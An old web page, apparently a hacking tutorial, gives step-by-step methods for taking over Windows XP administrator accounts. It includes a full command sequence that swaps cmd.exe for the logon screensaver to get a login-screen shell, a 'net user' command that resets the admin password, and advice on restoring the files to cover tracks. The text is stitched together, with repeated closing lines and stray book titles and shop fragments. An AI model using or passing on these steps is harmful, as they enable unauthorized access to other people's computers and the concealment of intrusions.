and this changes the password on franks machine to blah and your in.
Social Engineering: The Art of Human Hacking
Have fun
p.s: dont forget to copy the contents of temphack back into the system32 dir to cover tracks
Any updates, Errors, Suggestions or just general comments mail them to either
Estyle89@hotmail.com
jaoibh@hotmail.com   
  
How to Crack Password

How to Hack admin Passords

How to hack Windows XP Admin Passwords

This hack will only work if the person that owns the machine
has no intelligence. This is how it works:
When you or anyone installs Windows XP for the first time your
asked to put in your username and up to five others.
Now, unknownst to a lot of other people this is the only place in
Windows XP that you can password the default Administrator Diagnostic
Account. This means that to by pass most administrators accounts
on Windows XP all you have to do is boot to safe mode by pressing F8
during boot up and choosing it. Log into the Administrator Account
and create your own or change the password on the current Account.
This only works if the user on setup specified a password for the
Administrator Account.
Hacking: The Art of Exploitation, 2nd EditionGray Hat Hacking The Ethical Hackers Handbook, 3rd Edition
This has worked for me on both Windows XP Home and Pro.
-----------------------------------------------------------------------------
Now this one seems to be machine dependant, it works randomly(don't know why)

If you log into a limited account on your target machine and open up a dos prompt
then enter this set of commands Exactly:

(this appeared on www.astalavista.com a few days ago but i found that it wouldn't work
on the welcome screen of a normal booted machine)
-----------------------------------------------------------------------------
cd\ *drops to root
cd\windows\system32 *directs to the system32 dir
mkdir temphack *creates the folder temphack
copy logon.scr temphack\logon.scr *backsup logon.scr
copy cmd.exe temphack\cmd.exe *backsup cmd.exe
del logon.scr *deletes original logon.scr
rename cmd.exe logon.scr *renames cmd.exe to logon.scr
exit *quits dos
-----------------------------------------------------------------------------
Now what you have just done is told the computer to backup the command program
and the screen saver file, then edits the settings so when the machine boots the
screen saver you will get an unprotected dos prompt with out logging into XP.
Once this happens if you enter this command minus the quotes
"net user <admin account name here> password"
If the Administrator Account is called Frank and you want the password blah enter this
"net user Frank blah"
and this changes the password on franks machine to blah and your in.
Social Engineering: The Art of Human Hacking
Have fun
p.s: dont forget to copy the contents of temphack back into the system32 dir to cover tracks

Shop

Wolf - 150 x 150

Dmoz

Comments